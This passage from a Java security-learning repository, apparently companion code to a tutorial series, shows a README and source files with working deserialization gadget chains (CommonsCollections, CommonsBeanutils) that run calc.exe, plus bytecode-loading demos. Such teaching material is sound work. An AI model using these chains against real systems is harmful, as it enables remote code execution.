├── .gitignore ├── README.md ├── jdk8 ├── bytecodes │ ├── Foo.java │ ├── Hello.java │ └── HelloTemplatesImpl.java ├── pom.xml └── src │ └── main │ ├── java │ ├── com │ │ └── govuln │ │ │ ├── beans │ │ │ └── Cat.java │ │ │ ├── bytes │ │ │ ├── HelloBCEL.java │ │ │ ├── HelloClassLoader.java │ │ │ ├── HelloDefineClass.java │ │ │ └── HelloTemplatesImpl.java │ │ │ ├── client │ │ │ ├── JNDIClient.java │ │ │ ├── LDAPClient.java │ │ │ └── RMIClient.java │ │ │ ├── deserialization │ │ │ ├── CommonsBeanutils1.java │ │ │ ├── CommonsCollections1.java │ │ │ ├── CommonsCollections1For4.java │ │ │ ├── CommonsCollections2.java │ │ │ ├── CommonsCollections2TemplatesImpl.java │ │ │ ├── CommonsCollections3.java │ │ │ ├── CommonsCollections3For4.java │ │ │ ├── CommonsCollections6.java │ │ │ ├── CommonsCollections6For4.java │ │ │ ├── CommonsCollections6Multiple.java │ │ │ ├── CommonsCollectionsIntro.java │ │ │ ├── CommonsCollectionsIntro2.java │ │ │ ├── CommonsCollectionsIntro3.java │ │ │ ├── JDK7u21.java │ │ │ ├── TemplatesImplDeserialization.java │ │ │ └── URLDNS.java │ │ │ ├── js │ │ │ └── Eval.java │ │ │ ├── serialization │ │ │ ├── Converter.java │ │ │ ├── UserSerialization.java │ │ │ └── model │ │ │ │ └── User.java │ │ │ └── xxe │ │ │ ├── DocumentBuilderExample.java │ │ │ ├── SAXParserExample.java │ │ │ ├── XMLReaderExample.java │ │ │ ├── XMLStreamExample.java │ │ │ └── XPathExpressionExample.java │ └── evil │ │ ├── EvilTemplatesImpl.java │ │ └── Hello.java │ └── resources │ └── eval.js ├── shiroattack ├── pom.xml ├── shiroattack.iml └── src │ └── main │ └── java │ └── com │ └── govuln │ └── shiroattack │ ├── Client.java │ ├── Client0.java │ ├── Client1.java │ ├── CommonsBeanutils1Shiro.java │ ├── CommonsCollections6.java │ ├── CommonsCollectionsShiro.java │ └── Evil.java └── shirodemo ├── pom.xml ├── shirodemo.iml └── src └── main └── webapp ├── WEB-INF ├── shiro.ini └── web.xml ├── index.jsp └── login.jsp /.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | *.class 3 | *.jar 4 | *.war 5 | .idea 6 | .vscode -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # JavaThings - Java安全漫谈笔记相关 2 | 3 | 《Java安全漫谈》是我在写的一点Java学习相关的随笔,不是很严谨,也不是啥高科技。这个Repository主要是记录并整理一下,附加一些代码。 4 | 5 | ## Java安全漫谈目录 6 | 7 | - [Java安全漫谈 - 01.Java的动态特性——反射](https://t.zsxq.com/iyJiAMJ) 8 | - [Java安全漫谈 - 02.反射的简单利用](https://t.zsxq.com/iIa2B2j) 9 | - [Java安全漫谈 - 03.反射的几个进阶技巧](https://t.zsxq.com/MNRbayr) 10 | - [Java安全漫谈 - 04.RMI的通信过程分析](https://t.zsxq.com/FMJiUrV) 11 | - [Java安全漫谈 - 05.利用codebase攻击RMI Registry](https://t.zsxq.com/BuFy3zF) 12 | - [Java安全漫谈 - 06.深入理解RMI协议与序列化对象](https://t.zsxq.com/vZjaiuR) 13 | - [Java安全漫谈 - 07.不同语言中的反序列化漏洞](https://t.zsxq.com/NF2NfQf) 14 | - [Java安全漫谈 - 08.认识最简单的Gadget——URLDNS](https://t.zsxq.com/ieMZBQj) 15 | - [Java安全漫谈 - 09.初识CommonsCollections](https://t.zsxq.com/BmIIAy3) 16 | - [Java安全漫谈 - 10.用TransformedMap编写真正的POC](https://t.zsxq.com/ZNZrJMZ) 17 | - [Java安全漫谈 - 11.LazyMap详解](https://t.zsxq.com/FufUf2B) 18 | - [Java安全漫谈 - 12.简化版CommonsCollections6](https://t.zsxq.com/A2j2beE) 19 | - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) 20 | - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) 21 | - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) 22 | - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) 23 | - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) 24 | - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) 25 | - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) 26 | - [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) 27 | 28 | ## Demo代码 29 | 30 | 字节码: 31 | 32 | - 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) 33 | - 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) 34 | - 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) 35 | - 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 36 | 37 | 反序列化: 38 | 39 | - 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) 40 | - 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 41 | - 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) 42 | - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) 43 | - 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) 44 | - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) 45 | - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) 46 | - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) 47 | - 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) 48 | 49 | Shiro反序列化: 50 | 51 | - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) 52 | - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 53 | - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 54 | - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) 55 | 56 | 自研反序列化分析工具: 57 | 58 | - zkar: 59 | - 如何使用zkar修复SerialVersionUID不匹配的问题: 60 | -------------------------------------------------------------------------------- /jdk8/bytecodes/Foo.java: -------------------------------------------------------------------------------- 1 | public class Foo { 2 | 3 | } -------------------------------------------------------------------------------- /jdk8/bytecodes/Hello.java: -------------------------------------------------------------------------------- 1 | 2 | public class Hello { 3 | static { 4 | System.out.println("Hello World"); 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /jdk8/bytecodes/HelloTemplatesImpl.java: -------------------------------------------------------------------------------- 1 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 2 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 3 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 4 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 5 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 6 | 7 | public class HelloTemplatesImpl extends AbstractTranslet { 8 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {} 9 | 10 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {} 11 | 12 | public HelloTemplatesImpl() { 13 | super(); 14 | System.out.println("Hello TemplatesImpl"); 15 | } 16 | } -------------------------------------------------------------------------------- /jdk8/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 4.0.0 6 | 7 | com.govuln 8 | general 9 | 1.0-SNAPSHOT 10 | 11 | general 12 | 13 | http://www.example.com 14 | 15 | 16 | UTF-8 17 | 8 18 | 8 19 | 20 | 21 | 22 | 23 | 24 | commons-collections 25 | commons-collections 26 | 3.2.1 27 | 28 | 29 | 30 | org.apache.commons 31 | commons-collections4 32 | 4.0 33 | 34 | 35 | commons-beanutils 36 | commons-beanutils 37 | 1.9.4 38 | 39 | 40 | 41 | javassist 42 | javassist 43 | 3.12.1.GA 44 | 45 | 46 | 47 | commons-codec 48 | commons-codec 49 | 1.15 50 | 51 | 52 | 53 | commons-io 54 | commons-io 55 | 2.10.0 56 | 57 | 58 | 59 | 60 | org.springframework.boot 61 | spring-boot-starter-web 62 | 2.7.18 63 | 64 | 65 | 66 | 67 | org.yaml 68 | snakeyaml 69 | 1.33 70 | 71 | 72 | 73 | 74 | com.alibaba 75 | fastjson 76 | 1.2.24 77 | 78 | 79 | 80 | 81 | org.apache.bcel 82 | bcel 83 | 6.10.0 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | maven-clean-plugin 94 | 3.1.0 95 | 96 | 97 | 98 | maven-resources-plugin 99 | 3.0.2 100 | 101 | 102 | maven-compiler-plugin 103 | 3.8.0 104 | 105 | 106 | 107 | maven-surefire-plugin 108 | 2.22.1 109 | 110 | 111 | maven-jar-plugin 112 | 3.0.2 113 | 114 | 115 | maven-install-plugin 116 | 2.5.2 117 | 118 | 119 | maven-deploy-plugin 120 | 2.8.2 121 | 122 | 123 | 124 | maven-site-plugin 125 | 3.7.1 126 | 127 | 128 | maven-project-info-reports-plugin 129 | 3.0.0 130 | 131 | 132 | 133 | 134 | 135 | org.apache.maven.plugins 136 | maven-compiler-plugin 137 | 138 | 8 139 | 8 140 | 141 | 142 | 143 | 144 | 145 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/beans/Cat.java: -------------------------------------------------------------------------------- 1 | package com.govuln.beans; 2 | 3 | import org.apache.commons.beanutils.PropertyUtils; 4 | 5 | final public class Cat { 6 | private String name = "catalina"; 7 | 8 | public String getName() { 9 | return name; 10 | } 11 | 12 | public void setName(String name) { 13 | this.name = name; 14 | } 15 | 16 | public static void main(String []args) throws Exception { 17 | Cat cat = new Cat(); 18 | System.out.println(PropertyUtils.getProperty(cat, "name")); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java: -------------------------------------------------------------------------------- 1 | package com.govuln.bytes; 2 | 3 | import com.sun.org.apache.bcel.internal.classfile.JavaClass; 4 | import com.sun.org.apache.bcel.internal.classfile.Utility; 5 | import com.sun.org.apache.bcel.internal.Repository; 6 | // import com.sun.org.apache.bcel.internal.util.ClassLoader; 7 | 8 | public class HelloBCEL { 9 | public static void main(String []args) throws Exception { 10 | // encode(); 11 | decode(); 12 | } 13 | 14 | protected static void encode() throws Exception { 15 | JavaClass cls = Repository.lookupClass(evil.Hello.class); 16 | String code = Utility.encode(cls.getBytes(), true); 17 | System.out.println(code); 18 | } 19 | 20 | protected static void decode() throws Exception { 21 | // new ClassLoader().loadClass("$$BCEL$$$l$8b$I$A$A$A$A$A$A$AmP$cbN$CA$Q$ac$91$c7$$$cb$w$I$e2$fby0$B$P$ee$c5$h$c4$8b$89$f1$b0Q$T$M$9e$87e$82C$86$j$b3$M$q$7e$96$k4$f1$e0$H$f8Q$c6$9e$91$f8H$ecCW$ba$aa$ba$d23$ef$l$afo$AN$b0$X$a0$88$e5$Sj$a8$fbX$J$d0$c0$aa$875$P$eb$M$c5$8eL$a59e$c85$5b$3d$86$fc$99$k$I$86J$ySq9$j$f7Ev$c3$fb$8a$98Z$ac$T$aez$3c$93v$9e$93ys$t$t$Ma$yfRE$XB$v$ddf$f0$3b$89$9a$87$G$5d$3d$cd$Sq$$$ad$3bp$86$e3$R$9f$f1$Q$k$7c$P$h$n6$b1$c5Pv$ca$fe$ad$ce$d4$c0$c3v$88$j$ec$92$ff$t$95$a1j$d7$o$c5$d3at$d5$l$89$c4$fc$a1$ba$P$T$p$c6$f4$I$3d$r$a1$R$3bE$ea$e8$3a$93$a9$e9$9aL$f01$jV$ff$87f$f0$ee$ed$a4R$dak$c6$bf$o$N$d1$c3v$ab$87$D$U$e8$fbl$z$80$d9$c3$a9$97h$8a$I$Za$e1$e8$F$ec$d1$c9$B$f5$a2$ps$uS$P$bf$M$84$8b$84$3e$96$be$97$P$c9m$ab$f4$84$85Z$ee$Zy$h$c0$5c$40$e0$a4$CYmT$c5$FW$3f$B$dc$ab$c0$7f$cc$B$A$A").newInstance(); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java: -------------------------------------------------------------------------------- 1 | package com.govuln.bytes; 2 | 3 | import java.net.URL; 4 | import java.net.URLClassLoader; 5 | 6 | public class HelloClassLoader 7 | { 8 | public static void main( String[] args ) throws Exception 9 | { 10 | URL[] urls = {new URL("http://localhost:8000/")}; 11 | URLClassLoader loader = URLClassLoader.newInstance(urls); 12 | Class c = loader.loadClass("Hello"); 13 | c.newInstance(); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java: -------------------------------------------------------------------------------- 1 | package com.govuln.bytes; 2 | 3 | import org.apache.commons.codec.binary.Base64; 4 | 5 | import java.lang.reflect.Method; 6 | 7 | public class HelloDefineClass { 8 | public static void main(String[] args) throws Exception { 9 | Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class); 10 | defineClass.setAccessible(true); 11 | 12 | // source: bytecodes/Hello.java 13 | byte[] code = Base64.decodeBase64("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); 14 | Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); 15 | hello.newInstance(); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java: -------------------------------------------------------------------------------- 1 | package com.govuln.bytes; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import org.apache.commons.codec.binary.Base64; 6 | 7 | import java.lang.reflect.Field; 8 | 9 | public class HelloTemplatesImpl { 10 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 11 | Field field = obj.getClass().getDeclaredField(fieldName); 12 | field.setAccessible(true); 13 | field.set(obj, value); 14 | } 15 | 16 | public static void main(String[] args) throws Exception { 17 | // source: bytecodes/HelloTemplateImpl.java 18 | byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); 19 | TemplatesImpl obj = new TemplatesImpl(); 20 | setFieldValue(obj, "_bytecodes", new byte[][] {code}); 21 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 22 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 23 | 24 | obj.newTransformer(); 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/client/JNDIClient.java: -------------------------------------------------------------------------------- 1 | package com.govuln.client; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.InitialContext; 5 | import javax.naming.directory.InitialDirContext; 6 | import javax.naming.ldap.InitialLdapContext; 7 | import java.util.Hashtable; 8 | 9 | public class JNDIClient { 10 | public static void main(String[] args) throws Exception { 11 | Context initialContext = new InitialContext(); 12 | initialContext.lookup("ldap://127.0.0.1:389/sample"); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/client/LDAPClient.java: -------------------------------------------------------------------------------- 1 | package com.govuln.client; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.InitialContext; 5 | import javax.naming.NamingException; 6 | import javax.naming.directory.InitialDirContext; 7 | import java.util.Hashtable; 8 | 9 | public class LDAPClient { 10 | public static void main(String[] args) throws NamingException { 11 | Hashtable env = new Hashtable<>(); 12 | env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory"); 13 | env.put(Context.SECURITY_AUTHENTICATION, "simple"); 14 | env.put(Context.SECURITY_PRINCIPAL, "user"); 15 | env.put(Context.SECURITY_CREDENTIALS, "password"); 16 | env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389"); 17 | InitialContext ctx = new InitialDirContext(env); 18 | ctx.lookup("sample"); 19 | ctx.close(); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/client/RMIClient.java: -------------------------------------------------------------------------------- 1 | package com.govuln.client; 2 | 3 | import java.rmi.Naming; 4 | 5 | public class RMIClient { 6 | public static void main(String[] args) throws Exception { 7 | Naming.lookup("rmi://localhost:1099/test"); 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.io.ByteArrayOutputStream; 5 | import java.io.ObjectInputStream; 6 | import java.io.ObjectOutputStream; 7 | import java.lang.reflect.Field; 8 | import java.util.PriorityQueue; 9 | 10 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 11 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 12 | import javassist.ClassPool; 13 | import org.apache.commons.beanutils.BeanComparator; 14 | 15 | public class CommonsBeanutils1 { 16 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 17 | Field field = obj.getClass().getDeclaredField(fieldName); 18 | field.setAccessible(true); 19 | field.set(obj, value); 20 | } 21 | 22 | public static void main(String[] args) throws Exception { 23 | TemplatesImpl obj = new TemplatesImpl(); 24 | setFieldValue(obj, "_bytecodes", new byte[][]{ 25 | ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() 26 | }); 27 | setFieldValue(obj, "_name", "HelloTemplatesImpl"); 28 | setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); 29 | 30 | final BeanComparator comparator = new BeanComparator(); 31 | final PriorityQueue queue = new PriorityQueue(2, comparator); 32 | // stub data for replacement later 33 | queue.add(1); 34 | queue.add(1); 35 | 36 | setFieldValue(comparator, "property", "outputProperties"); 37 | setFieldValue(queue, "queue", new Object[]{obj, obj}); 38 | 39 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 40 | ObjectOutputStream oos = new ObjectOutputStream(barr); 41 | oos.writeObject(queue); 42 | oos.close(); 43 | 44 | System.out.println(barr); 45 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 46 | Object o = (Object)ois.readObject(); 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections.Transformer; 4 | import org.apache.commons.collections.functors.ChainedTransformer; 5 | import org.apache.commons.collections.functors.ConstantTransformer; 6 | import org.apache.commons.collections.functors.InvokerTransformer; 7 | import org.apache.commons.collections.map.TransformedMap; 8 | 9 | import java.io.ByteArrayInputStream; 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectInputStream; 12 | import java.io.ObjectOutputStream; 13 | import java.lang.annotation.Retention; 14 | import java.lang.reflect.Constructor; 15 | import java.lang.reflect.InvocationHandler; 16 | import java.util.HashMap; 17 | import java.util.Map; 18 | 19 | class CommonsCollections1 { 20 | public static void main(String[] args) throws Exception { 21 | Transformer[] transformers = new Transformer[] { 22 | new ConstantTransformer(Runtime.class), 23 | new InvokerTransformer("getMethod", new Class[] { String.class, 24 | Class[].class }, new Object[] { "getRuntime", 25 | new Class[0] }), 26 | new InvokerTransformer("invoke", new Class[] { Object.class, 27 | Object[].class }, new Object[] { null, new Object[0] }), 28 | new InvokerTransformer("exec", new Class[] { String.class }, 29 | new String[] { "calc.exe" }), 30 | }; 31 | 32 | Transformer transformerChain = new ChainedTransformer(transformers); 33 | Map innerMap = new HashMap(); 34 | innerMap.put("value", "xxxx"); 35 | Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain); 36 | 37 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 38 | Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); 39 | construct.setAccessible(true); 40 | InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); 41 | 42 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 43 | ObjectOutputStream oos = new ObjectOutputStream(barr); 44 | oos.writeObject(handler); 45 | oos.close(); 46 | 47 | System.out.println(barr); 48 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 49 | Object o = (Object)ois.readObject(); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import org.apache.commons.collections4.Transformer; 4 | import org.apache.commons.collections4.functors.ChainedTransformer; 5 | import org.apache.commons.collections4.functors.ConstantTransformer; 6 | import org.apache.commons.collections4.functors.InvokerTransformer; 7 | import org.apache.commons.collections4.map.TransformedMap; 8 | 9 | import java.io.ByteArrayInputStream; 10 | import java.io.ByteArrayOutputStream; 11 | import java.io.ObjectInputStream; 12 | import java.io.ObjectOutputStream; 13 | import java.lang.annotation.Retention; 14 | import java.lang.reflect.Constructor; 15 | import java.lang.reflect.InvocationHandler; 16 | import java.util.HashMap; 17 | import java.util.Map; 18 | 19 | public class CommonsCollections1For4 { 20 | public static void main(String[] args) throws Exception { 21 | Transformer[] transformers = new Transformer[] { 22 | new ConstantTransformer(Runtime.class), 23 | new InvokerTransformer("getMethod", new Class[] { String.class, 24 | Class[].class }, new Object[] { "getRuntime", 25 | new Class[0] }), 26 | new InvokerTransformer("invoke", new Class[] { Object.class, 27 | Object[].class }, new Object[] { null, new Object[0] }), 28 | new InvokerTransformer("exec", new Class[] { String.class }, 29 | new String[] { "calc.exe" }), 30 | }; 31 | 32 | Transformer transformerChain = new ChainedTransformer(transformers); 33 | Map innerMap = new HashMap(); 34 | innerMap.put("value", "xxxx"); 35 | Map outerMap = TransformedMap.transformedMap(innerMap, null, transformerChain); 36 | 37 | Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); 38 | Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class); 39 | construct.setAccessible(true); 40 | InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outerMap); 41 | 42 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 43 | ObjectOutputStream oos = new ObjectOutputStream(barr); 44 | oos.writeObject(handler); 45 | oos.close(); 46 | 47 | System.out.println(barr); 48 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 49 | Object o = (Object)ois.readObject(); 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.io.ByteArrayOutputStream; 5 | import java.io.ObjectInputStream; 6 | import java.io.ObjectOutputStream; 7 | import java.lang.reflect.Field; 8 | import java.util.Comparator; 9 | import java.util.PriorityQueue; 10 | 11 | import org.apache.commons.collections4.Transformer; 12 | import org.apache.commons.collections4.functors.ChainedTransformer; 13 | import org.apache.commons.collections4.functors.ConstantTransformer; 14 | import org.apache.commons.collections4.functors.InvokerTransformer; 15 | import org.apache.commons.collections4.comparators.TransformingComparator; 16 | 17 | public class CommonsCollections2 { 18 | public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { 19 | Field field = obj.getClass().getDeclaredField(fieldName); 20 | field.setAccessible(true); 21 | field.set(obj, value); 22 | } 23 | 24 | public static void main(String[] args) throws Exception { 25 | Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; 26 | Transformer[] transformers = new Transformer[] { 27 | new ConstantTransformer(Runtime.class), 28 | new InvokerTransformer("getMethod", new Class[] { String.class, 29 | Class[].class }, new Object[] { "getRuntime", 30 | new Class[0] }), 31 | new InvokerTransformer("invoke", new Class[] { Object.class, 32 | Object[].class }, new Object[] { null, new Object[0] }), 33 | new InvokerTransformer("exec", new Class[] { String.class }, 34 | new String[] { "calc.exe" }), 35 | }; 36 | Transformer transformerChain = new ChainedTransformer(fakeTransformers); 37 | 38 | Comparator comparator = new TransformingComparator(transformerChain); 39 | 40 | PriorityQueue queue = new PriorityQueue(2, comparator); 41 | queue.add(1); 42 | queue.add(2); 43 | 44 | setFieldValue(transformerChain, "iTransformers", transformers); 45 | 46 | ByteArrayOutputStream barr = new ByteArrayOutputStream(); 47 | ObjectOutputStream oos = new ObjectOutputStream(barr); 48 | oos.writeObject(queue); 49 | oos.close(); 50 | 51 | System.out.println(barr); 52 | ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); 53 | Object o = (Object)ois.readObject(); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java: -------------------------------------------------------------------------------- 1 | package com.govuln.deserialization; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 4 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 5 | import javassist.ClassPool; 6 | import javassist.CtClass; 7 | import org.apache.commons.collections4.Transformer; 8 | import org.apache.commons.collections4.comparators.TransformingComparator; 9 | import org.apache.commons.collections4.functors.InvokerTransformer; 10 | 11 | import java.io.ByteArrayInputStream; 12 | 